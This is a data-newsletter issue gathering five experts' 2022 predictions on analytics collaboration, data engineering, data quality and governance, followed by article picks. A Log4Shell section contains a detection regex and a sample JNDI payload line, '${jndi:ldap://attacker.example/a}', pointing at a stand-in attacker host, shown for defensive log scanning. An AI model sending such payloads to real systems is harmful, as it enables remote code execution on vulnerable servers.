The hype around data is not dying. Billions were poured into data start-ups in 2021, all focused on data ingestion, data storage, data visualization, machine learning, and just about every other way to manage or process data.
But where is this all going?
What data trends are here to stay and what is coming next?
Truthfully, no one knows. But the more perspectives we can get from experts, the more likely we are to see what is coming.
In this article, I asked 5 experts, ranging from founders of data start-ups like Hyperquery to data engineers delivering value to their counterparts on a daily basis. Each brought a great perspective on the question: where is data going in 2022?
So let’s dive in.
Robert Yi — Co-founder @ Hyperquery
The modern data stack has greatly matured over the past few years, to the point where anyone can stand up fully functional warehouse-centric data infra in a matter of hours. But there’s still a huge blank spot in one thin slice of the MDS that’s always hand-waved away — analytics. There are a ton of BI tools in the space that enable analysis, and these tools keep building deeper and deeper technical solutions. What these companies fail to recognize is that the most painful problems we face in analytics these days are rarely technical.
In my estimation, one aspect of analytics work that is being underserved is collaboration. Analytics is fundamentally a collaborative enterprise — you never do analytics in a vacuum the way that you might deploy machine learning models or push code. Your work is only valuable insofar as it can be used to inform a decision. Yet instead, work is done in IDEs and opaque dashboarding tools, shared in Google Docs only to quickly disappear into the ether after a single point of collaboration. Collaboration in modern data teams isn’t point-in-time, doc-based coexistence — it’s about having a common shared space that enables knowledge sharing and discovery. And the issue is rooted more deeply: anyone who’s worked in product analytics will tell you that the real pain comes from how poorly analyses are organized, how difficult they are to reproduce, and how hard past work is to discover.
We’ve gone the route of building a modern data workspace that directly solves these organizational and collaborative pain points by putting everything in one accessible, collaborative place (Hyperquery), and obviously I’d love to see us become the solution for writing and sharing analyses. But our bet and solution shape aside, it’s going to be exciting to see how modern organizations built on modern tooling start to solve these issues!
Chanin Nantasenamat, Ph.D. — Developer Advocate at Streamlit (previously a University Professor in Bioinformatics) - Data Professor
In harnessing the power of data science, acquiring the skill sets needed to transform data into actionable insights is no easy endeavor. I’ll be using my personal experience in academia as an example, which spans almost 20 years as both a PhD student and a Professor in the field of bioinformatics. The requisite skill sets in data science are best illustrated by the famous Venn diagram that describes the field broadly as the intersection of (1) domain knowledge, (2) computer science and (3) math/statistics. Those coming from a STEM background should be fairly comfortable with two of these skill sets, namely domain knowledge and math/statistics.
Firstly, the most important skill set is the ability to learn. After being in the data field for the past 15 years, I am always fascinated by the constantly evolving nature of the field and find myself constantly learning new concepts, algorithms, Python libraries/R packages, etc. In academia, the fast-paced nature of scientific research calls for novelty in the research submitted for publication in scientific journals. In my field of study (bioinformatics), novelty may come from the data, the experimental technique or the data analytic approach.
Perhaps the most difficult is coding skills, though this is becoming less of an issue in this day and age, when schools and universities are embracing the teaching of coding in languages such as Scratch and Python. Back in the day, at least for me, learning to code was quite a challenge: it took a lot of trial and error before I became comfortable with the logic, the high-level concepts and the syntax. I consider myself a self-taught programmer, as I mostly consulted books and web tutorials over the course of my learning journey. There were times when talking to a colleague more experienced in coding really helped clear up questions that no book had answers to. Having a peer or mentor to talk to can therefore speed up the journey. I find that asking lots of questions to clear up any doubts about concepts and syntax really makes the learning experience worthwhile.
Another often overlooked but important skill set is non-technical: communication. Oftentimes, at the end of any data science project we have to summarize all of the newfound knowledge into a logical set of results tables and figures, along with the insights and conclusions drawn from the analysis. Aside from written communication of results and insights, the ability to deliver this information precisely and verbally to audiences and stakeholders can make or break any data project.
Andreas Kretz — CEO of Learn Data Engineering - YouTube Channel
My prediction for 2022 is that we will see companies focus on data engineering even more. Very often the science part is now figured out, but the engineering is still either not there or stuck in a “slapped together” proof-of-concept phase. There will be huge demand for engineers in charge of platform and pipeline architecture and DevOps.
Another thing we have seen in the past months is growing hype around Data Lake and Data Warehouse integration. Very often you hear the term Lakehouse architecture. It’s something really worth looking into.
Because of this demand for good engineers, I am putting great effort into my educational content, adding even more courses to my Data Engineering Academy as well as starting a recruiting service for students.
mehdio — Data Engineer @ Back Market - mehdio DataTV
Launching a data stack for a data project has never been easier. A lot of previous data challenges (managing clusters, analytical databases, hardware servers) have been solved by SaaS/cloud services. To ingest data, we have platforms like Fivetran/Airbyte that save us from writing custom integration code, and for transformation, we have mature frameworks/platforms like dbt, Databricks, AWS Glue, etc. For analytics, Cloud Data Warehouses have been on the rise: BigQuery, Snowflake, Firebolt, plenty of choices again!
With that in mind, the new kids in town among data SaaS products are popping up around the next biggest data challenges: data catalog, data quality, and data lineage. Proof of that is that a lot of initially open-source projects like Great Expectations, DataHub, and Amundsen are now launching commercial products. Next to that, we have new platforms like Castor, Soda, Datafold, and Monte Carlo, just to list a few. And big players like Databricks and GCP are also diving into the topic (Unity Catalog, GCP Data Catalog).
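To make the data quality idea concrete, here is a minimal, hand-rolled sketch of the kind of declarative check that tools like Great Expectations automate. The function name and sample rows are illustrative only, not any library’s actual API:

```python
# A toy version of a declarative data-quality expectation: verify that a
# column contains no nulls and report which rows fail the check.
def expect_column_not_null(rows, column):
    failed = [i for i, row in enumerate(rows) if row.get(column) is None]
    return {"success": not failed, "failed_row_indexes": failed}

rows = [
    {"order_id": 1, "email": "a@example.com"},
    {"order_id": 2, "email": None},  # this row should fail the check
]

result = expect_column_not_null(rows, "email")
print(result)  # {'success': False, 'failed_row_indexes': [1]}
```

Real tools layer a lot on top of this (scheduled runs, alerting, data docs), but the core contract is the same: a named expectation, a pass/fail result, and a pointer to the failing records.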
What’s next for 2022? Well, all these tools are still pretty young and not widely adopted. Besides, this will create a drift in the organization, as data quality checks remain, in most companies, a technical job. So enabling good communication between technical people (Data Engineers/Data Scientists) and the business through a proper platform will be key. The same challenge applies to the data catalog: there needs to be a good loop between business documentation and technical documentation.
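That loop between business and technical documentation is easier to picture with an example. At its core, a catalog entry is just technical metadata paired with business context; a minimal sketch (all field names and values here are made up for illustration):

```python
from dataclasses import dataclass, field

# A toy catalog entry pairing technical metadata (owned by engineers)
# with business documentation (owned by domain experts).
@dataclass
class CatalogEntry:
    table: str
    owner: str                 # technical owner, e.g. the data engineering team
    business_description: str  # plain-language meaning for business users
    columns: dict = field(default_factory=dict)  # column -> description

entry = CatalogEntry(
    table="analytics.orders_daily",
    owner="data-engineering@company.example",
    business_description="One row per order, refreshed daily; "
                         "source of truth for revenue reporting.",
    columns={
        "order_id": "Unique order identifier",
        "gmv": "Gross merchandise value in EUR",
    },
)
print(entry.table, "->", entry.business_description)
```

Commercial catalogs add search, lineage graphs, and ownership workflows on top, but the hard part mehdio describes is organizational: keeping the `business_description` side as fresh as the technical side.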
George Firican — Founder of LightsOnData | Podcast Host: Lights On Data Show
The challenge with the majority of organizations that want to be data-driven is that they are either doing the bare minimum or they want to skip critical steps and get straight into acquiring data analytics, ML and AI capabilities. The problem? Neither is focused on establishing and solidifying a foundation for their data-driven capabilities to grow on. Most are skipping the data management and data governance steps. That’s just like planting a beautiful flower in the desert. Without nourishing soil and an appropriate environment, that flower won’t last long.
Sure, it’s easier to convince management to invest in a fancy AI program that promises incredible ROI than to invest time and resources in implementing a data governance program that many don’t even understand.
But without a solid data management and data governance foundation, that AI program will probably fail, or at the very least its ROI will not reach its full potential. That beautiful flower will wilt quickly or never bloom. Organizations that want to truly become data-driven need to understand the entire effort required to reach that state. They need to understand that to gain sustainable data analytics and ML/AI capabilities, one first needs a solid data management and data governance foundation.
Where Is Your Data Strategy Going In 2022?
2021 is over (in a few days).
And everything data-related is growing: the popularity of data engineering, our understanding of data science and where it fits, and of course… my YouTube channel.
So after reading these 5 data experts’ opinions on data trends, what are your thoughts?
Thanks To The SDG Community
I started writing this weekly update more seriously about 17-18 weeks ago. Since then I have gained hundreds of new subscribers as well as 30 supporters! I even got 30 special thanks on YouTube!
And all I can say is, Thank You!
You guys are keeping me motivated.
Also, if you’re interested in reading some of our past issues, such as Greylock VC and 5 Data Analytics Companies It Invests or The Future Of Data Science, Data Engineering, then consider subscribing and supporting the community!
Video Of The Week - I Quit My Job At Facebook
Is it really official if it’s not YouTube official?
Articles Worth Reading
There are 20,000 new articles posted on Medium daily, and that’s just Medium! I have spent a lot of time sifting through some of these articles, as well as TechCrunch and company tech blogs, and wanted to share some of my favorites!
What is Metabase? — A Clean Analytics Platform
“Metabase is an open source business intelligence tool. It lets you ask questions about your data, and displays answers in formats that make sense, whether that’s a bar graph or a detailed table.
Your questions can be saved for later, making it easy to come back to them, or you can group questions into great looking dashboards. Metabase also makes it easy to share questions and dashboards with the rest of your team.” -Metabase
6 inconvenient truths about Apache Airflow (and what to do about them)
Data teams that work with complex ingestion processes love Apache Airflow.
You can define your workflows in Python, the system has wide-ranging extensibility, and it offers a healthy breadth of plugins. Eighty-six percent of its users say they’re happy and plan to continue using it over other workflow engines. An equal number say they recommend the product.
But, like all software, and especially the open source kind, Airflow is plagued by a battery of gaps and shortcomings you’ll need to compensate for. For developers just getting acquainted with it, that means the starting is slow and the going is tough. In this article, we discuss those issues and a few possible workarounds.
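The “define your workflows in Python” point is the heart of Airflow’s appeal. As a flavor of what that means, here is a tiny, dependency-free sketch of the core idea behind a DAG scheduler: tasks plus dependencies, executed in an order that respects those dependencies. This illustrates the concept only; it is not Airflow’s actual API, and it omits things a real scheduler needs, like cycle detection and retries:

```python
# A toy task runner: each task names its upstream dependencies, and we
# execute tasks in dependency order (what Airflow's scheduler does at
# much larger scale, with scheduling, retries, and parallelism on top).
def run_dag(tasks, deps):
    done, order = set(), []

    def run(name):
        if name in done:
            return
        for upstream in deps.get(name, []):
            run(upstream)  # make sure dependencies finish first
        tasks[name]()
        done.add(name)
        order.append(name)

    for name in tasks:
        run(name)
    return order

tasks = {
    "extract": lambda: None,
    "transform": lambda: None,
    "load": lambda: None,
}
deps = {"transform": ["extract"], "load": ["transform"]}

print(run_dag(tasks, deps))  # ['extract', 'transform', 'load']
```

Everything Airflow layers on top of this core — scheduling intervals, operators, sensors, the web UI — is where both its extensibility and the article’s “inconvenient truths” live.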
The Log4j Log4Shell vulnerability: Overview, detection, and remediation
On December 9, 2021, a critical vulnerability in the popular Log4j Java logging library was disclosed and nicknamed Log4Shell. The vulnerability is tracked as CVE-2021-44228 and is a remote code execution vulnerability that can give an attacker full control of any impacted system.
In this blog post, we will:
provide key points and observations about Log4Shell from our research at Datadog
cover methods for identifying and securing vulnerable systems, and
describe the exploit chain in more detail
We will also look at how to leverage Datadog to protect your infrastructure and applications. Finally, we will provide some intelligence about exploitation attempts in the wild, showcasing how attackers are using this vulnerability.
Note: An official statement detailing how Datadog responded internally to this vulnerability is available here.
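One common first-pass step for identifying exposure is scanning request logs for JNDI lookup strings. Here is a naive sketch of that idea; note that real-world payloads are frequently obfuscated with nested lookups (for example `${${lower:j}ndi:...}`), so simple pattern matching like this catches only the most basic cases and is no substitute for patching:

```python
import re

# Match the classic Log4Shell payload shape: ${jndi:<protocol>://...}
JNDI_PATTERN = re.compile(r"\$\{jndi:(?:ldap|ldaps|rmi|dns)://", re.IGNORECASE)

def flag_suspicious(log_lines):
    """Return the log lines containing an un-obfuscated JNDI lookup string."""
    return [line for line in log_lines if JNDI_PATTERN.search(line)]

logs = [
    "GET /index.html 200",
    "User-Agent: ${jndi:ldap://attacker.example/a}",
]
print(flag_suspicious(logs))  # flags only the second line
```

The definitive fix remains upgrading Log4j (or applying the mitigations Datadog describes); scanning like this only helps triage which systems may have already been probed.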
End Of Day 30
Thanks for checking out our community. We put out 3-4 Newsletters a week discussing data, tech, and start-ups.
If you want to learn more, sign up today. You can subscribe for free to keep getting these newsletters.
Couldn't agree more with all the predictions! Demand for data engineers will be evident in 2022. Also, I think the DE role is going to start evolving faster. Nowadays it's relatively easy to set up data infrastructure and handle data operations using SaaS products; therefore, our role will be more focused on choosing the most appropriate stack and integrating data quality / data catalog capabilities into the existing ecosystems where we work.